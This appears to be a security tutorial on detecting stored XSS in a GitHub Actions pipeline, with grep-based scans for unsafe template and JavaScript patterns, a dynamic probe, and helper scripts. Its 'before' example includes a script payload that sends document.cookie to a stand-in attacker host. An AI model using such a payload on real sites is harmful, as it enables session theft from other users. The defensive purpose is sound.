CI/CD 2026-03-10

HTML-Encode User Content in Automated Security Scanning Workflows

Detect and prevent XSS vulnerabilities by automating HTML entity encoding validation in your GitHub Actions security pipeline. Includes a YAML workflow with grep-based XSS pattern detection and a dynamic XSS probe.

⚙️ Uses: HTML Entity Encoder — Free

The Problem

Your application renders user-provided content in HTML templates. A developer added a new feature and forgot to escape a field — now there's a stored XSS vulnerability in your codebase. You caught it in a security audit three months later. You need automated detection in CI.

Why This Matters

XSS (Cross-Site Scripting) has been part of every OWASP Top 10 list, as its own category through 2017 and under Injection since 2021. Stored XSS lets attackers inject malicious scripts that run in other users' browsers, where they can steal cookies, impersonate users, or redirect to phishing pages. Catching it in CI takes seconds and costs almost nothing. Catching it in a penetration test can cost thousands of dollars, and catching it after a breach can cost far more.

Step-by-Step Instructions

1

Test HTML encoding with the HTML Entity Encoder

Paste sample user-generated content into the HTML encoder. Verify that <, >, &, ", and ' are properly encoded. Use these encoded values as expected outputs in your security tests.
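If you prefer to generate the expected values in code, the sketch below uses Python's standard-library html.escape. The helper name encode_user_content is an illustrative assumption, not part of any framework. Note that encoders differ on quotes: html.escape emits &quot; and &#x27;, while MarkupSafe (used by Jinja2) emits &#34; and &#39;. All are valid, so generate test expectations with the same encoder your app uses.

```python
import html

# The five characters the step above asks you to verify.
SPECIAL_CHARS = ["<", ">", "&", '"', "'"]


def encode_user_content(text: str) -> str:
    """HTML-encode text for use in element content or quoted attribute values."""
    # quote=True (the default) also encodes double and single quotes.
    return html.escape(text, quote=True)


# Print the mapping so it can be compared against the encoder tool's output.
for ch in SPECIAL_CHARS:
    print(repr(ch), "->", encode_user_content(ch))

# Expected output for the classic probe string, reusable in security tests.
expected = encode_user_content("<script>alert(1)</script>")
print(expected)
```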

2

Add a pattern-based XSS scan to your workflow

Use grep -rn to scan your templates for patterns that indicate unescaped output. In Jinja2, leave {{ variable }} alone (it is escaped when auto-escaping is enabled) but flag {{ variable | safe }}, which bypasses escaping. In React, flag dangerouslySetInnerHTML. In plain JavaScript, flag innerHTML assignments.
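The same rules can be sketched as a small Python scanner, which is easier to unit-test than a grep one-liner. The rule names and the scan_source function are hypothetical, and the regular expressions are deliberately simple: they approximate the patterns described above and will miss multi-line expressions.

```python
import re

# Hypothetical rule set mirroring the patterns named in this step.
UNSAFE_PATTERNS = {
    # {{ ... | safe }} with optional whitespace around the pipe
    "jinja2-safe-filter": re.compile(r"\{\{[^}]*\|\s*safe\b[^}]*\}\}"),
    # Any use of React's raw-HTML escape hatch
    "react-dangerous-html": re.compile(r"dangerouslySetInnerHTML"),
}


def scan_source(text: str) -> list[tuple[int, str]]:
    """Return (line_number, rule_name) for every line matching an unsafe pattern."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        for rule, pattern in UNSAFE_PATTERNS.items():
            if pattern.search(line):
                findings.append((lineno, rule))
    return findings


sample = """<div>{{ comment.text }}</div>
<div>{{ comment.text | safe }}</div>
<div dangerouslySetInnerHTML={{ __html: body }} />"""

for lineno, rule in scan_source(sample):
    print(f"line {lineno}: {rule}")
```

The plain {{ comment.text }} on the first line is not reported, because only the | safe filter and dangerouslySetInnerHTML are treated as findings.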

3

Run a dynamic XSS probe with a known payload

In your integration test suite, submit the classic XSS probe string <script>alert(1)</script> as user input and verify it appears encoded in the HTML response. Any unencoded output is a vulnerability.
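The pass/fail decision for the probe can be sketched as a pure function that an integration test calls on the fetched page body. The function name classify_probe and its three return labels are assumptions made for illustration. Fetching the page is left to whatever HTTP client your test suite already uses.

```python
import html

PROBE = "<script>alert(1)</script>"


def classify_probe(page_html: str, probe: str = PROBE) -> str:
    """Classify a rendered page after the probe string was submitted as user input."""
    if probe in page_html:
        # The raw script tag survived rendering: the browser would execute it.
        return "vulnerable"
    if html.escape(probe) in page_html:
        # The probe is present only in its HTML-encoded form.
        return "encoded"
    # The probe was not found at all (stripped, truncated, or never stored).
    return "unknown"


print(classify_probe("<div>&lt;script&gt;alert(1)&lt;/script&gt;</div>"))
print(classify_probe("<div><script>alert(1)</script></div>"))
```

Treating "unknown" as a failure is the safer default, since a probe that never reached the page proves nothing about escaping.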

4

Block PRs that introduce unsafe HTML patterns

Fail the CI check when new | safe filters, innerHTML assignments, or dangerouslySetInnerHTML props are introduced. Require an explicit security review annotation (e.g., a comment # security: reviewed XSS safe) to bypass the check.
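One way to limit the check to newly introduced patterns is to inspect only the added lines of a unified diff, for example the output of git diff against the base branch. The sketch below is a minimal illustration under that assumption. The function name unreviewed_additions is hypothetical, and the annotation must sit on the same line as the flagged pattern.

```python
import re

# Unsafe patterns: Jinja2 "| safe" and innerHTML assignment (but not == comparison).
UNSAFE = re.compile(r"\|\s*safe\b|\.innerHTML\s*=(?!=)|dangerouslySetInnerHTML")
REVIEWED = "security: reviewed XSS safe"


def unreviewed_additions(diff_text: str) -> list[str]:
    """Return added diff lines that introduce an unsafe pattern without the annotation."""
    flagged = []
    for line in diff_text.splitlines():
        # Added lines start with "+"; "+++" marks the file header, not content.
        if not line.startswith("+") or line.startswith("+++"):
            continue
        added = line[1:]
        if UNSAFE.search(added) and REVIEWED not in added:
            flagged.append(added.strip())
    return flagged


diff = """\
--- a/app/templates/comment.html
+++ b/app/templates/comment.html
@@ -1,3 +1,4 @@
 <div class="comment">
-    {{ comment.text }}
+    {{ comment.text | safe }}
+    {{ footer_html | safe }} {# security: reviewed XSS safe #}
 </div>
"""

for line in unreviewed_additions(diff):
    print("needs review:", line)
```

A CI step would exit non-zero when the returned list is not empty. Here only the first added line is reported, because the second carries the review annotation.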

Before & After Example

Problem: user input rendered without HTML encoding in template
<!-- Jinja2 template — VULNERABLE -->
<div class="comment">
    {{ comment.text | safe }}  {# ← XSS vulnerability! #}
</div>

<!-- User input that exploits this: -->
<script>fetch('https://attacker.com/steal?c='+document.cookie)</script>

<!-- Result: browser executes attacker's JavaScript -->
Solution: CI scan detects unsafe patterns + dynamic XSS probe
name: Security Scan — XSS Detection
on: [push, pull_request]

jobs:
  xss-scan:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4

      - name: Scan templates for unsafe HTML patterns
        id: template_scan
        run: |
          echo "Scanning for potentially unsafe HTML patterns..."

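          # Lines carrying the review annotation are excluded from every scan below
          REVIEWED='security: reviewed XSS safe'

          # Flag | safe filters in Jinja2 (bypass auto-escaping); matches "|safe" and "| safe"
          UNSAFE=$(grep -rnE '\|\s*safe\b' app/templates/ --include='*.html' | grep -vF "$REVIEWED" || true)

          # Flag innerHTML assignment (= or +=) in JavaScript, but not == comparisons
          INNER_HTML=$(grep -rnE '\.innerHTML\s*\+?=([^=]|$)' app/static/js/ --include='*.js' | grep -vF "$REVIEWED" || true)

          # Flag dangerouslySetInnerHTML in React
          DANGEROUS=$(grep -rn 'dangerouslySetInnerHTML' src/ --include='*.jsx' --include='*.tsx' 2>/dev/null | grep -vF "$REVIEWED" || true)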

          if [ -n "$UNSAFE" ] || [ -n "$INNER_HTML" ] || [ -n "$DANGEROUS" ]; then
            echo "⚠️ Potentially unsafe HTML patterns detected:"
            [ -n "$UNSAFE" ] && echo "--- Jinja2 | safe filters ---" && echo "$UNSAFE"
            [ -n "$INNER_HTML" ] && echo "--- innerHTML assignments ---" && echo "$INNER_HTML"
            [ -n "$DANGEROUS" ] && echo "--- dangerouslySetInnerHTML ---" && echo "$DANGEROUS"
            echo ""
            echo "Review each occurrence. Add '# security: reviewed XSS safe' comment if intentional."
            echo "unsafe_found=true" >> $GITHUB_OUTPUT
          else
            echo "✓ No unsafe HTML patterns found"
            echo "unsafe_found=false" >> $GITHUB_OUTPUT
          fi

      - name: Start test server
        # Assumes an earlier step created .venv and installed the app's dependencies
        run: .venv/bin/uvicorn app.main:app --host 0.0.0.0 --port 8000 &
        timeout-minutes: 1

      - name: Run dynamic XSS probe
        run: |
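          # Wait up to 30 seconds for the server to accept connections
          for _ in $(seq 1 30); do
            curl -s -o /dev/null http://localhost:8000/ && break
            sleep 1
          done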

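          # Quote-free payload: encoders differ on quotes (&quot; vs &#34;) but agree on &lt; and &gt;
          XSS_PAYLOAD='<script>alert(1)</script>'
          ENCODED_PAYLOAD='&lt;script&gt;alert(1)&lt;/script&gt;'

          # Build the JSON body with jq so the payload is escaped correctly
          JSON_BODY=$(jq -cn --arg text "$XSS_PAYLOAD" '{text: $text}')

          # Submit XSS payload as a comment
          RESPONSE=$(curl -s -X POST http://localhost:8000/api/comments \
            -H 'Content-Type: application/json' \
            -d "$JSON_BODY")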

          # Fetch the page that renders comments
          PAGE=$(curl -s http://localhost:8000/comments/)

          if echo "$PAGE" | grep -qF "$XSS_PAYLOAD"; then
            echo "❌ XSS VULNERABILITY DETECTED: raw script tag found in response"
            exit 1
          elif echo "$PAGE" | grep -qF "$ENCODED_PAYLOAD"; then
            echo "✓ XSS safe: payload was properly HTML-encoded"
          else
            # Neither form was found, so the probe proved nothing; fail rather than pass silently
            echo "⚠️ Could not verify XSS encoding: manual review required"
            exit 1
          fi

      - name: Fail on unsafe patterns (require review)
        if: steps.template_scan.outputs.unsafe_found == 'true'
        run: |
          echo "CI blocked: unsafe HTML patterns require security review"
          exit 1

Frequently Asked Questions

Does Jinja2 auto-escape HTML by default?

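Not on its own: a bare jinja2.Environment has auto-escaping off unless you enable it with the autoescape option. Flask enables it for templates ending in .html, .htm, .xml, and .xhtml, and FastAPI's Jinja2Templates (from Starlette) enables it by default. With auto-escaping on, {{ var }} is safe in HTML element content and quoted attribute values. The {{ var | safe }} filter bypasses escaping and should be used only for trusted, pre-sanitized HTML.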

What's the difference between HTML encoding and sanitization?

Encoding converts < to &lt; so the browser displays markup as literal text. It is safe for text content, but any formatting the user typed shows up as raw tags. Sanitization (e.g., via DOMPurify or bleach) keeps an allowlist of HTML tags (bold, links) while stripping dangerous tags and attributes (script, onerror). Use encoding for plain text fields and sanitization for rich text editors.
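The difference is easiest to see side by side. The sketch below contrasts html.escape with a toy allowlist sanitizer built on the standard-library HTMLParser. The AllowlistSanitizer class, the sanitize helper, and the ALLOWED_TAGS set are all hypothetical and exist only to illustrate the idea. For real rich-text input, use a maintained sanitizer such as the ones named above.

```python
import html
from html.parser import HTMLParser

# Hypothetical allowlist; every attribute is dropped, including on allowed tags.
ALLOWED_TAGS = {"b", "i", "em", "strong"}


class AllowlistSanitizer(HTMLParser):
    """Toy sanitizer: keeps allowlisted tags, drops all others, encodes text."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.parts = []

    def handle_starttag(self, tag, attrs):
        if tag in ALLOWED_TAGS:
            self.parts.append(f"<{tag}>")  # attributes such as onerror are discarded

    def handle_endtag(self, tag):
        if tag in ALLOWED_TAGS:
            self.parts.append(f"</{tag}>")

    def handle_data(self, data):
        self.parts.append(html.escape(data))  # text content is always encoded


def sanitize(text: str) -> str:
    parser = AllowlistSanitizer()
    parser.feed(text)
    parser.close()  # flush any buffered text
    return "".join(parser.parts)


rich = "<b>bold</b> <img src=x onerror=alert(1)>"
print(html.escape(rich))  # encoding: every tag becomes visible text
print(sanitize(rich))     # sanitizing: <b> survives, <img> is removed
```

Encoding turns the whole string into visible text, including the harmless bold tag. The sanitizer keeps the bold formatting and removes the img element together with its onerror handler.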

Can I use semgrep for more comprehensive XSS detection?

Yes. semgrep --config=p/xss has rules for Jinja2, React, Angular, and Django XSS patterns. Semgrep's command-line scanner is open source and can run directly in a GitHub Actions step; the older returntocorp/semgrep-action wrapper is deprecated in favor of calling semgrep yourself. Add it alongside grep-based checks for defense in depth.
